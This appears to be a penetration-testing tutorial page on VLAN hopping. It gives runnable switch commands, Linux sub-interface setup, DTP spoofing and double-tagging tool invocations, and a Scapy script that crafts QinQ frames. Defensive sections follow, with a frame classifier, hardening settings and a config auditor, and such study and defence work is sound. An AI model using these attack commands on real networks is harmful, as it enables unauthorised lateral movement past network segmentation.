Lateral VLAN Segmentation Bypass
{{#include ../../banners/hacktricks-training.md}}
If direct access to a switch is available, VLAN segmentation can be bypassed. This involves reconfiguring the connected port to trunk mode, establishing virtual interfaces for target VLANs, and setting IP addresses, either dynamically (DHCP) or statically, depending on the scenario (for further details check https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9).
Initially, the specific port you are connected to must be identified. This can typically be accomplished through CDP messages, or by filtering the MAC address table with an include mask.
If CDP is not operational, port identification can be attempted by searching for the MAC address:
```
SW1(config)# show mac address-table | include 0050.0000.0500
```
Prior to switching to trunk mode, a list of existing VLANs should be compiled, and their identifiers determined. These identifiers are then assigned to the interface, enabling access to various VLANs through the trunk. The port in use, for instance, is associated with VLAN 10.
```
SW1# show vlan brief
```
Transitioning to trunk mode entails entering interface configuration mode:
```
SW1(config)# interface GigabitEthernet 0/2
SW1(config-if)# switchport trunk encapsulation dot1q
SW1(config-if)# switchport mode trunk
```
Switching to trunk mode will temporarily disrupt connectivity, but this can be restored subsequently.
Virtual interfaces are then created, assigned VLAN IDs, and activated:
```bash
sudo vconfig add eth0 10
sudo vconfig add eth0 20
sudo vconfig add eth0 50
sudo vconfig add eth0 60
sudo ifconfig eth0.10 up
sudo ifconfig eth0.20 up
sudo ifconfig eth0.50 up
sudo ifconfig eth0.60 up
```
Subsequently, an address request is made via DHCP. Alternatively, in cases where DHCP is not viable, addresses can be manually configured:
```bash
sudo dhclient -v eth0.10
sudo dhclient -v eth0.20
sudo dhclient -v eth0.50
sudo dhclient -v eth0.60
```
Example for manually setting a static IP address on an interface (VLAN 10):
```bash
sudo ifconfig eth0.10 10.10.10.66 netmask 255.255.255.0
```
Connectivity is tested by initiating ICMP requests to the default gateways for VLANs 10, 20, 50, and 60.
Ultimately, this process bypasses VLAN segmentation, giving unrestricted access to any VLAN and setting the stage for subsequent actions.
Other VLAN-Hopping Techniques (no privileged switch CLI)
The previous method assumes authenticated console or Telnet/SSH access to the switch. In real-world engagements the attacker is usually connected to a regular access port. The following Layer-2 tricks often let you pivot laterally without ever logging into the switch OS:
1. Switch-Spoofing with Dynamic Trunking Protocol (DTP)
Cisco switches that keep DTP enabled will happily negotiate a trunk if the peer claims to be a switch. Crafting a single DTP “desirable” or “trunk” frame converts the access port into an 802.1Q trunk that carries all allowed VLANs.
Yersinia and several PoCs automate the process:
```bash
# Become a trunk using Yersinia (GUI)
$ sudo yersinia -G   # Launch GUI → Launch attack → DTP → enabling trunking

# Python PoC (dtp-spoof)
$ git clone https://github.com/fleetcaptain/dtp-spoof.git
$ sudo python3 dtp-spoof/dtp-spoof.py -i eth0 --desirable
```
Once the port switches to trunk you can create 802.1Q sub-interfaces and pivot exactly as shown in the previous section. Modern Linux kernels no longer require vconfig; instead use ip link:
```bash
sudo modprobe 8021q
sudo ip link add link eth0 name eth0.30 type vlan id 30
sudo ip addr add 10.10.30.66/24 dev eth0.30
sudo ip link set eth0.30 up
```
2. Double-Tagging (Native-VLAN Abuse)
If the attacker sits on the native (untagged) VLAN, a crafted frame with two 802.1Q headers can "hop" to a second VLAN even when the port is locked in access mode. Tooling such as VLANPWN DoubleTagging.py (2022-2024 refresh) automates the injection:
```bash
python3 DoubleTagging.py \
  --interface eth0 \
  --nativevlan 1 \
  --targetvlan 20 \
  --victim 10.10.20.24 \
  --attacker 10.10.1.54
```
Packet walk-through:
- Outer tag (1) is stripped by the first switch because it matches the native VLAN.
- Inner tag (20) is now exposed; the frame is forwarded onto the trunk towards VLAN 20.
The technique still works in 2025 on networks that leave the native VLAN at the default and accept untagged frames.
3. QinQ (802.1ad) Stacking
Many enterprise cores support Q-in-Q service provider encapsulation. Where permitted, an attacker can tunnel arbitrary 802.1Q-tagged traffic inside a provider (S-tag) to cross security zones. Look for the 802.1ad ethertype 0x88a8 in captures and test whether the switch pops the outer tag by sending a stacked S-tag/C-tag frame with Scapy:
```python
from scapy.all import Ether, Dot1Q, IP, ICMP, sendp

outer = 100  # Service tag (S-tag)
inner = 30   # Customer / target VLAN (C-tag)
# The S-tag is signalled by ethertype 0x88a8 on the Ethernet header; the stacked
# Dot1Q layers carry the service tag followed by the customer tag (0x8100).
frame = (Ether(dst="ff:ff:ff:ff:ff:ff", type=0x88a8) / Dot1Q(vlan=outer)
         / Dot1Q(vlan=inner) / IP(dst="10.10.30.1") / ICMP())
sendp(frame, iface="eth0")
```
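From the defender's side, the three techniques above all leave distinctive frames on an access port. As an added example (not code from the original page or from the tools it cites), this pure-Python classifier flags DTP negotiation frames, double-tagged 802.1Q frames and 802.1ad QinQ frames in raw Ethernet data such as a pcap payload. The DTP field layout (Cisco multicast MAC, SNAP PID 0x2004, status TLV masks) is assumed to match the Wireshark DTP dissector, and the sample frames are constructed, not captured.

```python
import struct

# Cisco DTP multicast MAC, LLC/SNAP header (Cisco OUI, DTP PID 0x2004) and the
# admin-status names used by the Wireshark DTP dissector (assumed layout).
DTP_MAC = bytes.fromhex("01000ccccccc")
SNAP_DTP = bytes.fromhex("aaaa03" "00000c" "2004")
TAS_NAMES = {1: "on", 2: "off", 3: "desirable", 4: "auto"}
TAG_ETHERTYPES = (b"\x81\x00", b"\x88\xa8")  # 802.1Q C-tag, 802.1ad S-tag

def parse_tags(frame: bytes) -> list:
    """Return the VLAN IDs of every stacked 802.1Q/802.1ad tag after the MAC header."""
    vlans, off = [], 12
    while len(frame) >= off + 4 and frame[off:off + 2] in TAG_ETHERTYPES:
        vlans.append(struct.unpack("!H", frame[off + 2:off + 4])[0] & 0x0FFF)
        off += 4
    return vlans

def dtp_admin_status(frame: bytes):
    """Return the DTP trunk admin status ('desirable', 'auto', ...) or None if not DTP."""
    if frame[:6] != DTP_MAC or frame[14:22] != SNAP_DTP:
        return None
    off = 23  # skip 802.3 length (2), LLC/SNAP (8) and DTP version (1)
    while len(frame) >= off + 4:
        ttype, tlen = struct.unpack("!HH", frame[off:off + 4])
        if ttype == 0x0002 and tlen == 5:  # status TLV; length includes its 4-byte header
            return TAS_NAMES.get(frame[off + 4] & 0x07, "unknown")
        off += max(tlen, 4)  # never loop forever on a malformed zero length
    return "unknown"

def classify(frame: bytes) -> list:
    """Findings for one raw Ethernet frame seen on an access port."""
    findings = []
    status = dtp_admin_status(frame)
    if status is not None:
        findings.append(f"DTP negotiation frame (admin status: {status})")
    vlans = parse_tags(frame)
    if frame[12:14] == b"\x88\xa8":
        findings.append(f"802.1ad QinQ frame with S-tag {vlans[0]}")
    if len(vlans) >= 2:
        findings.append(f"stacked tags {vlans}: double-tagging towards VLAN {vlans[-1]}")
    return findings

# Constructed sample frames (not real captures); IPV4 is a dummy 20-byte IP header.
SRC, IPV4 = bytes.fromhex("005000000500"), b"\x45" + b"\x00" * 19
def build_dtp(status_byte: int) -> bytes:
    body = b"\x01" + struct.pack("!HHB", 2, 5, status_byte) + struct.pack("!HHB", 3, 5, 0xA0)
    return DTP_MAC + SRC + struct.pack("!H", len(SNAP_DTP) + len(body)) + SNAP_DTP + body
DTP_DESIRABLE = build_dtp(0x03)                       # TOS=access, TAS=desirable
DOUBLE_TAGGED = b"\xff" * 6 + SRC + bytes.fromhex("8100 0001 8100 0014 0800") + IPV4
QINQ = b"\xff" * 6 + SRC + bytes.fromhex("88a8 0064 8100 001e 0800") + IPV4
```

Any DTP frame arriving on a port that should be a plain access port, and any frame with more than one tag, is worth an alert: a correctly hardened access port never sees either.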
Defensive Recommendations
- Disable DTP on all user-facing ports:
  ```
  switchport mode access
  switchport nonegotiate
  ```
- Change the native VLAN on every trunk to an unused, black-hole VLAN and tag it:
  ```
  vlan dot1q tag native
  ```
- Prune unnecessary VLANs on trunks:
  ```
  switchport trunk allowed vlan 10,20
  ```
- Enforce port security, DHCP snooping and dynamic ARP inspection to limit rogue Layer-2 activity.
- Prefer private VLANs or L3 segmentation instead of relying solely on 802.1Q separation.
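To check a running-config against the points above, here is an added example (not from the original page) that audits an IOS-style configuration for ports that still negotiate DTP, trunks left on native VLAN 1 without native tagging, and trunks that carry every VLAN. It assumes Catalyst defaults (an L2 port with no `switchport mode` line is dynamic auto) and uses a constructed sample config.

```python
def parse_interfaces(config: str) -> dict:
    """Map each 'interface X' block of an IOS-style config to its indented sub-commands."""
    interfaces, current = {}, None
    for raw in config.splitlines():
        if raw.startswith("interface "):
            current = interfaces.setdefault(raw.split(" ", 1)[1].strip(), [])
        elif raw.startswith(" ") and current is not None:
            current.append(raw.strip())
        else:
            current = None  # '!' or a global command ends the interface block
    return interfaces

def audit(config: str) -> dict:
    """Return {interface: [findings]} against the hardening points listed above."""
    tag_native = "vlan dot1q tag native" in config.splitlines()
    findings = {}
    for name, lines in parse_interfaces(config).items():
        issues = []
        # L2 port without 'switchport mode' = dynamic auto on Catalyst (DTP on); skip routed/SVI.
        default = "auto" if any(l.startswith("switchport") for l in lines) else None
        mode = next((l.split()[-1] for l in lines if l.startswith("switchport mode ")), default)
        if mode in ("auto", "desirable"):
            issues.append(f"dynamic trunking ({mode}): port will negotiate a trunk on request")
        if mode == "access" and "switchport nonegotiate" not in lines:
            issues.append("DTP still sent on access port: add 'switchport nonegotiate'")
        if mode == "trunk":
            native = next((int(l.split()[-1]) for l in lines if l.startswith("switchport trunk native vlan ")), 1)
            if native == 1:
                issues.append("trunk keeps default native VLAN 1: move it to an unused VLAN")
            if not tag_native:
                issues.append("native VLAN untagged: set 'vlan dot1q tag native' globally")
            if not any(l.startswith("switchport trunk allowed vlan ") for l in lines):
                issues.append("trunk carries every VLAN: prune with 'switchport trunk allowed vlan'")
        if issues:
            findings[name] = issues
    return findings

# Constructed sample config (not from a real device): weak and hardened access ports, unpruned trunk.
SAMPLE_CONFIG = """\
vlan dot1q tag native
!
interface GigabitEthernet0/1
 switchport mode access
interface GigabitEthernet0/2
 switchport mode access
 switchport nonegotiate
interface GigabitEthernet0/24
 switchport mode trunk
"""
```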
References
- https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9
- VLANPWN attack toolkit – https://github.com/casterbytethrowback/VLANPWN
- Twingate "What is VLAN Hopping?" (Aug 2024) – https://www.twingate.com/blog/glossary/vlan%20hopping